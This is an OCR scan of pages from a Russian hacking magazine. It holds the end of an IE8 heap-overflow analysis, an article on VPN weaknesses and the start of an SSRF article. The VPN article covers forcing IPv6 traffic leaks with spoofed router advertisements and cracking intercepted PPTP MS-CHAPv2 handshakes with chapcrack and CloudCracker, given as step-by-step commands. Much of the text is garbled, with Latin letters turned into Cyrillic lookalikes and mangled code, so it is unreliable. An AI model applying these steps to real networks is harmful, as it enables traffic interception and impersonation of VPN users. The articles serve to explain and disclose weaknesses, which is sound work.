3012ЕС7С |МОѴ ЭМОКО РТР 55 : [ЕВР-30] , ЕАХ // Сохранение 

// в [ЕВР-30] 

И самозаполнение буфера: 

; СТаЫеІ_ауоиТ: :Са1си1а1еМіпМах() — гпБбІтІ.сШ (ІЕ8) 

3012ЕСР4 |МОѴ ЕАХ, ЭІлЮВО РТР 55: [ЕВР-30] 

3012ЕСЭ7 |МОѴ ОМОРЭ РТР 55: [ЕВР-0С] , ЕАХ // Значение 

// МЮТН 
// сохраняется 
// в [ЕВР-0С] 

[...] 

ЗЭ12ЕО0С |/МОѴ ЕСХ,РІлІОРО РТР 55:[ЕВР-24] 

ЗО12ЕЭ0Р ||МОѴ ЕАХ,ОЫОРЭ РТР 05:[ЕВХ+9С] /У Извлечение 

// из буфера 

ЗЭ12Е015 ЦАЭО ЕАХ, ЕСХ 

[...] 

3012Е03А | | РІІ5Н ОИОКО РТР 55:[ЕВР-40] // Аг§3 

3012Е03Э ||МОѴ ЕАХ,0№0(Ф РТР 55:[ЕВР-34] 

ЗЭ12ЕО40 | | РЫ5Н ЭМОРО РТР 55:[ЕВР+0С] // Аг§2 

3012Е043 ||МОѴ Е5І,0М0РР РТР 55:[ЕВР-28] 

3012ЕЭ46 I ІРЫ5Н ОЫОРЭ РТР 55:[ЕВР-0С] Ц Аг§1 => 

// атрибут ширины 

зоі2Е049 Исаи - 

СТаЫеСоІСаІс : : АсІэиБТРогСоІ // Заполнение текущего ІЧСЮЕ 

Последняя функция будет заполнена буфером из одного узла 
с размером зіге 0x1 С, состоящего из значений атрибута ѴѴЮТН. 
Однако в связи стем, что 5РАМ-атрибут динамично меняется через 
Э5, это приводит к дополнительным итерациям в цикле, которые 
в конечном счете заканчиваются оиІ-оМюипсІ5. В итоге цикл при- 
ходит к следующему: 

; СТаЫе1.ауоиТ : :Са1си1аТеМіпМах() — шБбТтІ.сІІІ (ІЕ8) 
3012Е058 || СМР ЕАХ,РМОРО РТР 55:[ЕВР+10] // Конечное 

// условие, когда 
/У счетчик > АРС.З 

3012Е05В | \Л 5Н0РТ 3012Е0ѲС // АРС.З является 

// обновленным атрибутом 
// 5 РАМ 

Это означает, что семь структур с размером 0x1 С будут обрабо- 
таны, хотя места у настолько для шести структур. Это и приводит 
к переполнению кучи, что позволяет создать специальную стра- 
ницу для выполнения произвольных команду посетителя. 

Эксплуатация с обходом А51.Р/0ЕР. Поскольку эта уязвимость 
приводит к беар оѵегЯоѵѵ, то это может использоваться для РСЕ с об- 
ходом и РЕР, и А51_В. Это возможно, так как мы можем достать нуж- 
ный нам адрес из тзЫтЫІІ и провести беар зргау (об этой технике 
не раз писал в нашем журнале Алексей Синцов), основанной на этом 
адресе, что приведет к выполнению уязвимости и загрузке нуж- 
ного пейлоада. Об этом ты можешь дочитать в блоге ѴирепБесигііу 
по ссылке: ЬіІ.Іѵ/МОѵТ . 

Все версии Іпіегпеі Ехріогег. 

Ц.Ц І НММ 

Установитьпоследние пропатченные версии браузеров. Или, 
как мы уже писали, не использовать ІЕ :). з: 



072 



ХАКЕР 113/170/2013 






взлом 



Антон Жуков 



Такой небезопасный 




РАЗБИРАЕМСЯ, МОЖНО ЛИ ДОВЕРЯТЬ 
ВИРТУАЛЬНЫМ ЧАСТНЫМ СЕТЯМ СВОИ СЕКРЕТЫ 

Когда необходимо получить доступ к корпоративной сети, скрыть свой трафик от бдительЩ-о взора 
провайдера, скрыть свое реальное местоположение при проведении каких-либо деликатн^шействий, 
обычно прибегают к использованию ѴРІМ. Можно ли спокойно выдохнуть, подклкЭчившисьИэодному 

туннелю? Однозначно — нет. 




ЖАКЫІМС 

Вся информация предоставлена исключительно 8 озна- 
комительных целях. 

Ни редакция, ни автор не несут ответственности за лю- 
бой возможный вред, причиненный материалами данной 
статьи. 





взлом 



ѴРМ НАМ НУЖЕН! 

Виртуальная частная сеть, или просто ѴРМ, — обобщенное название 
технологий, позволяющих обеспечить одно или несколько сетевых 
соединений (логическую сеть) поверх другой сети, например интер- 
нета. Несмотря на то что коммуникации могут быть реализованы 
через публичные сети с неизвестным уровнем доверия, уровень до- 
верия к построенной логической сети не зависит от уровня доверия 
к базовым сетям благодаря использованию средств криптографии 
(шифрования, аутентификации, инфраструктуры открытых ключей, 
средств для защиты от повторов и изменений передаваемых 
по логической сети сообщений). Как видишь, в теории все радужно 
и безоблачно, на практике же все несколько иначе. В этой статье 
мы рассмотрим два основных момента, которые обязательно нужно 
принимать во внимание, пользуясь ѴРМ. 

УТЕЧКА ѴРЫ-ТРАФИКА 

Первая проблема, связанная с виртуальными частными сетями, — 
это утечка трафика. То есть тот трафик, который должен быть пере- 
дан через ѴРМ-соединение в зашифрованном виде, попадает в сеть 
в открытом виде. Данный сценарий не является следствием ошибки 
в ѴРМ-сервере или клиенте. Здесь все гораздо интереснее. Самый 
простой вариант — внезапный разрыв ѴРМ-соединения. Ты решил 
просканировать хост или подсеть с помощью Мтар, запустил сканер, 
отошел на несколько минут от монитора, и тут ѴРМ-соединение вне- 
запно отвалилось. Но сканер при этом продолжает работать. И ска- 
нирование идет уже с твоего адреса. Вот такая неприятная ситуация. 
Но есть сценарии и интересней. Например, утечка ѴРМ-трафика 
широко распространена в сетях (на хостах), поддерживающих обе 
версии протокола ІР (так называемые гіиаі-зіаскеб сети/хосты). 

КОРЕНЬ ЗЛА 

Сосуществование двух протоколов — ІРѵ4 и ІРѵб — имеет мно- 
жество интересных и тонких аспектов, которые могут приводить 
к неожиданным последствиям. Несмотря на то что шестая версия 
протокола ІР не имеет обратной совместимости с четвертой вер- 
сией, обе эти версии как бы «склеены» вместе системой доменных 
имен (0ІМ5). Чтобы было понятней, о чем идет речь, давай рассмо- 
трим простенький пример. Например, возьмем сайт (скажем, ѵѵѵѵѵѵ. 
ехатріе.сот), который имеет поддержку ІРѵ4 и ІРѵб. Соответству- 
ющее ему доменное имя (ѵѵѵѵѵѵ.ехатріе.сот в нашем случае) будет 
содержать Р1\15-записи обоих типов: А и АААА. Каждая А-запись 
содержит один ІРѵ4-адрес, а каждая АААА-запись содержит один 
ІРѵб-адрес. Причем для одного доменного имени может быть по не- 
сколько записей обоих типов. Таким образом, когда приложение, 
поддерживающее оба протокола, захочет взаимодействовать 



с сайтом, оно может запросить любой из доступных адресов. Пред- 
почитаемое семейство адресов (ІРѵ4 или ІРѵб) и конечный адрес, 
который будет использоваться приложением (учитывая, что их 
существует несколько для четвертой и шестой версий), будет от- 
личаться от одной реализации протокола к другой. 

Это сосуществование протоколов означает, что, когда клиент, 
поддерживающий оба стека, собирается взаимодействовать с другой 
системой, наличие А- и АААА-записей будет оказывать влияние на то, 
какой протокол будет использоваться для связи с этой системой. 

ѴРЫ И ДВОЙНОЙ СТЕК ПРОТОКОЛОВ 

Многие реализации ѴРЫ не поддерживают или, что еще хуже, 
полностью игнорируют протокол ІРѵб. При установке соединения 
программное обеспечение ѴРМ берет на себя заботу по транс- 
портировке ІРѵ4-трафика — добавляет дефолтный маршрут 
для ІРѵ4-пакетов, обеспечивая тем самым, чтобы весь ІРѵ4-трафик 
отправлялся через ѴРМ-соединение (вместо того чтобы он отправ- 
лялся в открытом виде через локальный роутер). Однако, если ІРѵб 
не поддерживается (или полностью игнорируется), каждый пакет, 
в заголовке которого указан ІРѵб-адрес получателя, будет отправ- 
лен в открытом виде через локальный ІРѵб-роутер. 

Основная причина проблемы кроется в том, что, хотя ІРѵ4 
и ІРѵб — два разных протокола, несовместимых друг с другом, они 
тесно используются в системе доменных имен. Таким образом, 
для системы, поддерживающей оба стека протоколов, невозможно 
обеспечить безопасность соединения с другой системой, не обе- 
спечив безопасность обоих протоколов (ІРѵб и ІРѵ4). 

ЛЕГИТИМНЫЙ СЦЕНАРИЙ УТЕЧКИ ѴРЫ-ТРАФИКА 

Рассмотрим хост, который поддерживает оба стека протоколов, 
использует ѴРМ-клиент (работающий только с ІРѵ4-трафиком) 
для подключения к ѴРМ-серверу и подключен к сіиаі-зіаскесі сети. 
Если какому-то приложению на хосте нужно взаимодействовать 
с сіиаі-зіаскесі узлом, клиент обычно запрашивает и А-, и АААА- 
0М5-записи. Так как хост поддерживает оба протокола, а удален- 
ный узел будет иметь оба типа йМБ-записей (А и АААА), то одним 
из вероятных вариантов развития событий будет использование 
для связи между ними ІРѵб-протокола. А так как ѴРМ-клиент 
не поддерживает шестую версию протокола, то ІРѵб-трафик не бу- 
дет отправляться через ѴРМ-соединение, а будет отправляться 
в открытом виде через локальную сеть. 

Такой вариант развития событий подвергает угрозе передава- 
емые в открытом виде ценные данные, в то время как мы думаем, 
что они безопасно передаются через ѴРМ-соединение. В данном 
конкретном случае утечка ѴРМ-трафика является побочным 




НеНо 

Рапболп 16 Вуіе БегѵегСЬаІІепде 



бепегаіе 16 Вуіе СІіепіСЬаІІепде 

і 

СЬаІІепдеНазЬ = БНАЦСІіепіСМаІІепде II ЗегѵегСЬаІІепде II Ц5егМате)[0:8] 

* 

ІМТНазН = М 04 | 1 )$егРа 5 $ѵѵогбІ 

І 

СЬаІІепдеРезропзе = ОЕ5мтНа5Ь[00;07](СЬаІІепдеНа$Ы II ОЕ5мтна5Ы07;14)1СЬа11епдеНа5Ы II 
0Е5мтна5Ыи;2і](СЬаІІепдеНа5Ы 

24 Вуіе СЬаІІепдеРезропзе, 16 Вуіе СЬаІІепдеНазЬ, Цзегпате 



М04|М04ІІІ$егРа55ѵѵогб)) = МТНазЬНазН 

і 

БНАІІЫТНазМНазЬ II СЬаІІепдеРезропзе II "Мадіс зегѵег Іо сііепі зідпіпд сопзІапГ) * Эідезі 

I 

5Н А1 Юідезі II СЬаІІепдеНазЬ II ‘Раб (о таке іі бо тоге іЬап опе ііегаііоп*] = АиіЬРезропзе 
АиІЬРезропбе | 



Схема работы протокола М5-СНАРѵ2 




Известные(эеленые) и неизвестные(красные) данные 
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Такой небезопасный ѴРІМ 



кеуОпе = ЫІИ,Ь; 
кеуТѵго « ЫІЛ,Ь; 

іог (іпЪ і=0; і<2 А 56; і++) { 
гезиіі = ОЕЗквуіі) (рІаіпСехС) ; 

(гезиіі: — сірЬег^ехіІ) 
кеуОпе - гезиІЪ; 
еізе (гезиіі — сірЬег^ех1:2) 
кеуТѵю * гезиіѣ; 



Оптимизированный код 



Рііе Туре 

СГіарсгаск Оиіри! 



М5-СНАРѵ2 (РРТР/ѴѴРА-Е) 0 



СЬоо$ѳ Рііе 



оиІруПхІ 



Ыехі » 



Загрузка файла, содержащего все необходимые данные для взлома оставшихся 
двух 0Е5-ключей 



эффектом использования ПО, не поддерживающего ІРѵб, в сети 
(и на хосте), поддерживающей(ем) оба протокола. 

ПРЕДНАМЕРЕННО ВЫЗЫВАЕМ УТЕЧКУ ѴРЫ-ТРАФИКА 

Атакующий может преднамеренно вызвать подключение по про- 
токолу ІРѵб на компьютере жертвы, посылая поддельные ІСМРѵб 
Роиіег Агіѵегіізетепі сообщения. Подобные пакеты можно рас- 
сылать при помощи таких утилит, как гІасМ ( Ьі1.1ѵ/ѴУ1_ІН4х ). 516 
Меіѵѵогкв' ІРѵб Тооікіі ( ЬіІ.Іѵ/ТУсІѵл/бі ) или ТНС-ІРѵб ( ЬіІ.Іѵ/1 50РОЬС ). 

Как только соединение по протоколу ІРѵб установлено, «общение» 
с системой, поддерживающей оба стека протоколов, может вылить- 
ся, как рассмотрено выше, в утечку УРИ-трафика. 

И хотя данная атака может быть достаточно плодотворной (из-за 
растущего числа сайтов, поддерживающих ІРѵб), она приведет 
к утечке трафика, только когда получатель поддерживает обе версии 
протокола ІР. Однако для злоумышленника не составит труда вы- 
звать утечки трафика и для любого получателя (сіиаі-зіаскесі или нет). 
Рассылая поддельные РоЫег АсіѵегІІБетепІ сообщения, содержащие 
соответствующую Р0М55-опцию, атакующий может прикинуться ло- 
кальным рекурсивным 0М5-сервером, затем провести РМ5-спуфинг, 
чтобы осуществить атаку тап-іп-іЬе-тісісІІе и перехватить соот- 
ветствующий трафик. Как и в предыдущем случае, помогут такие 
инструменты, как 516 Меіѵѵогкз' ІРѵб Тооікіі и ТНС-ІРѵб. 

ПОЛЕЗНЫЕ СОВЕТЫ 

Совсем не дело, если трафик, не предназначенный для чужих глаз, 
попадет в открытом виде в сеть. Как же обезопаситься в таких 
ситуациях? Вот несколько полезных рецептов: 

1. Если УРИ-клиент сконфигурирован таким образом, чтобы отправ- 
лять весь ІРѵ4 -трафик через УРЫ-соединение, то: 

• если ІРѵб УРИ-клиентом не поддерживается — отключить 
поддержку шестой версии протокола ІР на всех сетевых интер- 
фейсах. Таким образом, у приложений, запущенных на ком- 
пьютере, не будет другого выбора, как использовать ІРѵ4; 

• если ІРѵб поддерживается— убедиться, что весь ІРѵб-трафик 
также отправляется через ѴРІМ. 

2. Чтобы избежатьутечкитрафика, вслучаеесли ѴРІМ-соединение 
внезапно отвалится и все пакеты будут отправляться через сіе^аиіі 
даіеѵѵау, можно: 

• принудительнозаставитьвесьтрафик идти через ѴРІМ 

> гоиТе сІеІеТе 0.0. 0.0 192.168.1.1 // удаляем сІе-РаиІТ 

// еаТемау 

> гоиТе асісі 83.170.76.128 тазк 255.255.255.255 
192.168.1.1 теТгіс 1 



отслеживаетсостояние УРИ-соединения и, кактолько оно про- 
падает, мгновенно завершаетуказанные пользователем при- 
ложения (например, торрент-клиенты, веб-браузеры, сканеры); 
• ил и утилитой ѴРМСЬеск ( Ьі1.Іѵ/І\Л/Х2Кт) . которая взависимости 
от выбора пользователя может либо полностью отключить 
сетевую карту, либо просто завершитьуказанные приложения. 



3. Проверить, уязвима литвоя машина кутечке 0М5-трафика, можно 
на сайте сіпзіеакіевісот. после чего применить советы, как по- 
фикситьутечку, описанныетѵт: ЬН.1у/НКр028 . 

РАСШИФРОВКА ѴРМ-ТРАФИКА 

Даже если ты все настроил правильно и твой ѴРІМ-трафик не утека- 
ет в сеть в открытом виде — это еще не повод расслабляться. Все 
дело в том, что если кто-то перехватит зашифрованные данные, 
передаваемые через ѴРІМ-соединение, то он сможет их расшифро- 
вать. Причем на это никак не влияет, сложный у тебя пароль или 
простой. Если ты используешь ѴРМ-соединение на базе протокола 
РРТР, то со стопроцентной уверенностью можно сказать, что весь 
перехваченный зашифрованный трафик можно расшифровать. 

АХИЛЛЕСОВА ПЯТА 

При ѴРМ-соединениях на базе протокола РРТР (РоіпМо-РоіпІ 
Типпеііпд Ргоіосоі) аутентификация пользователей проводится 
по протоколу М5-СНАРѵ2, разработанному компанией МісгозоН. 
Несмотря на то что М5-СНАРѵ2 устарел и очень часто становится 
предметом критики, его продолжают активно использовать. Чтобы 
окончательно отправить его на свалку истории, за дело взялся 
известный исследователь Мокси Марлинспайк, который на двад- 
цатой конференции йЕР СОМ отчитался, что поставленная цель 
достигнута — протокол взломан. Надо сказать, что безопасностью 
этого протокола озадачивались и ранее, но столь долгое использо- 
вание М5-СНАРѵ2, возможно, связано с тем, что многие иссле- 
дователи концентрировались только на его уязвимости к атакам 
по словарю. Ограниченность исследований и широкое число под- 
держиваемых клиентов, встроенная поддержка операционными 
системами — все это обеспечило протоколу М5-СНАРѵ2 широкое 
распространение. Для нас же проблема кроется в том, что М5- 
СНАРѵ2 применяется в протоколе РРТР, который используется 
многими ѴРІМ-сервисами (например, такими крупными, как ано- 
нимный ѴРМ-сервис ІРгесІаІог и ТЬе Рігаіе Вау'з ѴРМ). 

Если обратиться к истории, то уже в 1999 году в своем ис- 
следовании протокола РРТР Брюс Шнайер указал, что «МісгозоІІ 
улучшил РРТР, исправив основные изъяны безопасности. Однако 
фундаментальная слабость аутентификации и шифрования про- 
токола в том, что он безопасен настолько, насколько безопасен 
выбранный пользователем пароль». Это почему-то заставило про- 
вайдеров поверить, что ничего страшного в РРТР нет и если тре- 
бовать от пользователя придумывать сложные пароли, то переда- 
ваемые данные будут в безопасности. Сервис Рівеир.пеі настолько 
проникся этой идеей, что решил самостоятельно генерировать 
для пользователей пароли длиной в 21 символ, не давая им воз- 
можности установить свои. Но даже такая жесткая мера не спасает 
от расшифровки трафика. Чтобы понять почему, давай поближе по- 
знакомимся с протоколом М5-СНАРѵ2 и посмотрим, как же Мокси 
Марлинспайк сумел его взломать. 

ПРОТОКОЛ М5-СНАРѴ2 

Как уже было сказано, М5-СНАРѵ2 применяется для аутентифика- 
ции пользователей. Происходит она в несколько этапов: 
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взлом 



Кеу 1 Кеу 2 Кеу 3 

Ы?І?І?І?І?І?І?І?І?І?І?І?І?І?І?І?І?І?І?І?І 



Три РЕЗ-ключа по 7 байт 




• клиент посылаетзапрос на аутентификацию серверу, открыто 
передавая свой Іодіп; 

• сервер возвращает клиенту 16-байтовый случайный отклик 
(АиіЬепІісаІогСЬаІІепде); 

• клиентгенерирует 16-байтовый РАС (РеегАиіЬепІісаІог 
СЬаІІепде — равный отклик аутентификации); 

• клиентобъединяетРАС,откликсервера исвоеизегпате водну 
строку; 

• с полученной строки снимается 8-байтовый хеш по алгоритму 
5НА-1 и посылается серверу; 

• сервер извлекает из своей базы хеш данного клиента и расшиф- 
ровываете^ ответ; 

• если результат расшифровки совпадете исходным откликом, все 
ОК, и наоборот; 

• впоследствии сервер берет РАС клиента и на основе хеша генери- 
рует 20-байтовый АР (АиіЬепІісаІогРезропзе— аутентификаци- 
онный ответ), передавая его клиенту; 

• кл иент продел ываетту же самую операцию и сравнивает полу- 
ченный АР с ответом сервера; 

• если все совпадает, клиентаутентифицируется сервером. 

На рисунке на предыдущем развороте представлена схема 
работы протокола. На первый взгляд протокол кажется излиш- 
не сложным — куча хешей, шифрование, случайные сЬаІІепде. 

На самом деле все не так уж и сложно. Если присмотреться 
внимательней, то можно заметить, что во всем протоколе остается 
неизвестной только одна вещь — Мй4-хеш пароля пользователя, 
на основании которого строятся три 0Е5-ключа. Остальные же 
параметры либо передаются в открытом виде, либо могут быть 
получены из того, что передается в открытом виде. 

Так как почти все параметры известны, то мы можем их не рас- 
сматривать, а остановить свое пристальное внимание на том, 
что неизвестно, и выяснить, что это нам дает. 

Итак, что мы имеем: неизвестный пароль, неизвестный 
МР4-хеш этого пароля, известный открытый текст и известный 
шифртекст. При более детальном рассмотрении можно заметить, 
что пароль пользователя нам не важен, а важен его хеш, так 
как на сервере проверяется именно он. Таким образом, для успеш- 
ной аутентификации от имени пользователя, а также для рас- 
шифровки его трафика нам необходимо знать всего лишь хеш его 
пароля. 

Имея на руках перехваченный трафик, можно попробовать его 
расшифровать. Есть несколько инструментов (например, азіеар — 
ЬіІ.Іѵ/ВсІІАМІ . которые позволяют подобрать пароль пользователя 
через атаку по словарю. Недостаток этих инструментов в том, 
что они не дают стопроцентной гарантии результата, а успех напря- 
мую зависит от выбранного словаря. Подбирать же пароль простым 
брутфорсом тоже не очень эффективно — например, в случае 
с РРТРѴРІМ сервисом гізеир.пеі, который принудительно устанав- 




ливает пароли длиной в 21 символ, придется перебирать 96 вари- 
антов символа для каждого из 21 символов. Это в результате дает 
96 А 21 вариантов, что чуть больше, чем 2 Л 138. Иными словами, надо 
подобрать 138-битный ключ. В ситуации же, когда длина пароля 
неизвестна, имеет смысл подбирать Мй4-хеш пароля. Учитывая, 
что его длина равна 128 бит, получаем 2 Л 128 вариантов — на дан- 
ный момент это просто нереально вычислить. 

РАЗДЕЛЯЙ И ВЛАСТВУЙ 

М04-хеш пароля используется в качестве входных данных для трех 
ОЕБ-операций. 0Е5-ключи имеют длину 7 байт, так что каждая 
0Е5-операция использует 7-байтовый фрагмент М04-хеша. Все 
это оставляет возможность для классической атаки сііѵісіе апсі 
сопциег. Вместо того чтобы полностью брутить М04-хеш (а это, 
как ты помнишь, 2 А 1 28 вариантов), мы можем подбирать его по ча- 
стям в 7 байт. Так как используются три 0Е5-операции и каждая 
0Е5-операция абсолютно независима от других, это дает общую 
сложность подбора, равную 2 А 56 + 2 А 56 + 2 А 56, или 2 А 57.59. Это уже 
значительно лучше, чем 2 А 138 и 2 А 1 28, но все еще слишком боль- 
шое число вариантов. Хотя, как ты мог заметить, в эти вычисления 
закралась ошибка. В алгоритме используются три 0Е5-ключа, 
каждый размером в 7 байт, то есть всего 21 байт. Эти ключи берут- 
ся из Мй4-хеша пароля, длина которого всего 16 байт. 

То есть не хватает 5 байт для построения третьего 0Е5-ключа. 

В МісгозоН решили эту задачу просто, тупо заполнив недостающие 
байты нулями и фактически сведя эффективность третьего ключа 
к двум байтам. 

Так как третий ключ имеет эффективную длину всего лишь 
два байта, то есть 2 А 16 вариантов, его подбор занимает считаные 
секунды, доказывая эффективность атаки сііѵісіе апсі сопциег. Итак, 
можно считать, что последние два байта хеша известны, оста- 
ется подобрать оставшиеся 14. Также разделив их на две части 
по 7 байт, имеем общее число вариантов для перебора, равное 
2 А 56 + 2 А 56 = 2 А 57. Все еще слишком много, но уже значительно 
лучше. Можно решить задачу перебора «в лоб»: организовать 
два цикла, в первом перебирать ключи для первого шифртекста, 
во втором — для второго. Но если обратить внимание на то, что 
оставшиеся 0Е5-операции шифруют один и тот же текст, только 
при помощи разных ключей, то логичней будет организовать один 
цикл, внутри которого проверять оба ключа. То есть получается 
2 А 56 вариантов ключей для перебора. А это значит, что безопас- 
ность М5-СНАРѵ2 может быть сведена к стойкости одного 0Е5- 
шифрования. 

ВЗЛОМ йЕ5 

Теперь, когда диапазон подбора ключа известен, для успешного 
завершения атаки дело остается только за вычислительными мощ- 
ностями. В 1998 году Еіесігопіс Ргопііег Роипгіаііоп построила ма- 
шину йеер Сгаск, которая стоила 250 тысяч долларов и позволяла 
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Такой небезопасный ѴРЫ 



Кѳу 1 Кѳу 2 Кеу 3 

І?І?І?М?І?1Л Н?І?М?І?іЛ І?|?|о|о|о1о1о1 



Не хватает 5 байт для третьего 0Е5-ключа 



Кеу 1 Кеу 2 Кеу 3 

1 ? 1 ?|?|?|?|?|?|?|?|?|?|?|?|?|?|?|?|?|?|?|?| 

4 

і?і?і?і?і?і?і?і?і?і?і?і?і?і?і?і?і 



Для трех ключей по 7 байт используется 16-байтный хеш 



взламывать 0Е5-ключ в среднем за четыре с половиной дня. В на- 
стоящее время Рісо СотріЛіпд, специализирующаяся на постро- 
ении РР6А-оборудования для криптографических приложений, 
построила РР6А-устройство ШЕ5 сгаскіпд Ьох), которое реализует 
йЕ5 как конвейер с одной 0Е5-операцией на каждый тактовый 
цикл. Обладая 40 ядрами по 450 МГц, оно позволяет перебирать 
18 миллиардов ключей в секунду. Обладая такой скоростью пере- 
бора, 0Е5 сгаскіпд Ьох в худшем случае взламывает ключ 0Е5 
за 23 часа, а в среднем за полдня. Данная чудо-машина доступна 
через коммерческий веб-сервис сіоигісгаскег.сот . Так что теперь 
можно взломать любой М$-СНАРѵ2 ЬапбзЬаке меньше, чем за день. 
А имея хеш пароля, можно аутентифицироваться от имени пользо- 
вателя на ѴРЬІ-сервисе или просто расшифровывать его трафик. 

Для автоматизации работы с сервисом и обработки пере- 
хваченного трафика Мокси выложил в открытый доступ утили- 
ту сЬарсгаск. Она парсит перехваченный сетевой трафик, ища 
М5-СНАРѵ2 ЬапсізЬаке'и. Для каждого найденного «рукопожатия» 
она выводит имя пользователя, известный открытый текст, два из- 
вестных шифртекста и взламывает третий ОЕБ-ключ. Кроме этого, 
она генерирует токен для СІоибСгаскег, в котором закодированы три 
параметра, необходимые, чтобы сервис взломал оставшиеся ключи. 

ЧТО ДЕЛАТЬ? 

Хоть МісгозоК и пишет на своем сайте, что на данный момент 
не располагает сведениями об активных атаках с использованием 
сЬарсгаск, а также о последствиях таких атак для пользователь- 
ских систем, но это еще не значит, что все в порядке. Мокси реко- 



:-/Ое$кіор/сИарсгаск# сЬарсгаск рагзе і іе$і$/ррір.сар 
ОоТ сотрІеТеО Ьапгізбаке [192.168.43.114 --> 198.252.153.26] 

Сгаскіпд КЗ 

Ц$ег = тохіе 
С1 = 1с93аЬсе8154ѲѲ68 
С2 = 6ЬаесаЗШ348469 
СЗ = 25642Ѳ598а73а049 
Р = 6(1Ѳе1сѲ56С(І94<Ш 
КЗ = С304ѲѲѲѲѲѲѲѲѲѲ 

СІоцОСгаскег 5иЬ?пі5зіоп = $99$Ь04сВЦг7ТѴ8ск6ѵ0дѴ0АабииузРМКры90= 



Пример работы приложения сЬарсгаск 



кеуОпе - N111,1.; 
кеуТѵо - ЖИЛ.; 




*ог (іпЬ і-0; і<2 А 56; і++) 


1 


і і (ОЕЗк«уііі (рІаіпЬехЬ) — 
кеуОпе - кеу [ і 3 ; 

Ьгеак; 

) 


■ сірЬегЬехЫМ 


) 

ІОІ (іпь і-0;і<2 А 56;і++) 


( 


і* (ОЕЗіиуш (рІаіп^ехЬ) ■■ 
кеуТѵю - кеу(і); 

Ьгеак; 

) 

1 


- сірЬегЬехЬ2) { 



І7А7А7І 

М5-СНАРѵ2 ПРС: 

ЫЦу/Ѵ Л0гѵѵ5. 



РТ7Л 

Весь описанный 
в статье софт 
ты найдешь 
на нашем диске. 



Метод решения задачи «в лоб» 



мендует всем пользователям и провайдерам РРТР ѴРЫ решений 
начинать миграцию на другой ѴРІЧ-протокол. А РРТР-трафик счи- 
тать незашифрованным. Как видишь, налицо еще одна ситуация, 
когда ѴРЫ может нас серьезно подвести. 

ЗАКЛЮЧЕНИЕ 

Так сложилось, что ѴРЫ ассоциируется с анонимностью и безопас- 
ностью. Люди прибегают к использованию ѴРЫ, когда хотят скрыть 
свой трафик от бдительных глаз провайдера, подменить свое 
реальное географическое положение и так далее. На деле полу- 
чается, что трафик может «протечь» в сеть в открытом виде, а если 
и не в открытом, то зашифрованный трафик могут достаточно бы- 
стро расшифровать. Все это еще раз напоминает, что нельзя слепо 
полагаться на громкие обещания полной безопасности и аноним- 
ности. Как говорится, доверяй, но проверяй. Так что будь начеку 
и следи за тем, чтобы твое ѴРМ-соединение было по-настоящему 
безопасным и анонимным, з: 



СЮІЮСКАСКЕР & СНАРСРАСК 



Когда требуется взломать 0Е5-ключи из перехваченного 
пользовательского трафика, большой сложности нет. Это реализуется 
довольно просто. 

1. Скачиваем библиотеку РаззІіЬ ( ЬИ.Іѵ/ТЦггеЕ ). реализующую более 30 
различныхалгоритмовхешированиядляязыка РуіЬоп, распаковыва- 
ем иустанавливаем: 

> руТЬоп зеТир.ру іпзТаІІ 

2. Устанавливаем руіЬоп-т2сгурІо— обертку 0реп55І_для РуіЬоп: 

> зисіо арТ-§еТ іпзТаІІ руТЬоп-т2сгурі:о 

3. Скачиваем саму утилиту сЬарсгаск ( Ыі.Іу/ОпбОіс І. распаковываем 
иустанавливаем: 

> руТЬоп зеТир.ру іпзТаІІ 



4. СЬарсгаск установлена, можно приступать к парсингу перехвачен- 
ного трафика. Утилита принимает на вход сар-файл, ищет в нем М5- 
СНАРѵ2 ЬапсізЬаке'и, из которых извлекаетнеобходимую для взлома 
информацию. 

> сЬарсгаск рагзе -і ТезТз/ррТр 

5. Из выводимых утилитой сЬарсгаск данных копируем значение строки 
СІоисіСгаскег БиЬтіззіоп и сохраняем в файл (например, оиІриШІ) 

6. Идем на сіоискгаскег.сот. на панели «Біагі Сгаскіпд» выбираем Рііе 
Туре, равный «М5-СНАРѵ2 (РРТР/МРА-Е)», выбираем предваритель- 
но подготовленный на предыдущем шаге файл оиіриМхі, нажимаем 
Мехі, Ыехі и указываем свой е-таіі, на который придетсообщение 

по окончании взлома. 

Кнебольшомусожалению, сервисСІоисіСгаскегплатный. Ксчастью, 
за взлом ключиков придется отдать не так уж много— всего 20 баксов. 
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гаОМ$ес_ІаЬ |ІаЬ(0оп5ес.ги, ІаЬ.оп5ес.ги] 



55КР: вели кий 

и ужасный зйй 



ЮАРИШО 

Вся информация 
предоставлена 
исключительно 
в ознакомитель- 
ных целях. 

Ни редакция, 
ни автор не несут 
ответственности 
за любой воз- 
можный вред, 
причиненный 
материалами 
данной статьи. 



Надеемся, тебе пришлась по вкусу первая часть рассказа про 55РР-атаки, опубликованная в прошлом 
номере. Если нет, смело перелистывай следующие пять страниц — пусть другие ломают системы 
и получают вознаграждения с помощью этих техник :). Если серьезно, то очень рекомендуем перечесть 
первую, вводную часть, чтобы понять этот материал. А теперь настало время ломать! 





55РР: великий и ужасный 



ЗАВЕЩАНИЕ УЧИТЕЛЯ ФИЗИКИ 
НАЧИНАЛОСЬ СО СЛОВА «ДАНО» (С) 

Дано: возможность подделывать запросы от имени сервера. Под- 
делывать — значит иметь возможность изменять как минимум 
один из параметров: 

• адрес получателя; 

• порт получателя; 

• данныетела пакета. 

Под запросами понимаем не только ТСР/ІШР-пакеты, но и раз- 
личные вариации типа ІРС (ипіх зоскеіз). Как мы подделываем 
запрос? В общем случае говорим о некоем приложении, функцио- 
нирующем от данных удаленного пользователя. Эти данные управ- 
ляют функционалом приложения, который подвержен одной или 
нескольким уязвимостям. Уязвимости эти условно можно разбить 
на следующие группы: 

• недостаточная фильтрация при записи данных в сокеты (СВ1_Р 
іпіесііопз); 

• небезопасные сетевые библиотеки (сІІРЦ І.ѴѴР, ^ѵа ІІРІ_); 

• обработка форматовфайловсоссылками на внешниеданные 
(ХМ1_, РОР, ОрепОНісе); 

• обработка протоколов со ссылками на внешниеданные (БОН; 

• использование функций АРІ с возможностью доступа к внешним 
данным (РРІ). 

Вместе такая комбинация открывает в пользовательских данных 
некоторый вектор атаки; он, обработанный на серверной стороне 
логикой приложения, спровоцирует приложение, а значит, сам сер- 
вер, на котором оно запущено, открыть сокет и послать туда данные. 

Дополнительным условием является возможность прочитать 
те данные, которые вернулись нам в открытый сокет от атакуе- 
мого сервиса. Тут могут быть разные вариации от полного чтения 
до ограниченного каким-либо определенным форматом и полной 
невозможности чтения. 

Во всех случаях, рассмотренных далее, предполагается, 
что на целевом сервисе, который мы атакуем, отсутствует автори- 
зация. То есть сервис — получатель подделанного пакета не имеет 
авторизации, только Ьозі-Ьазесі сетевые ограничения, исключаю- 
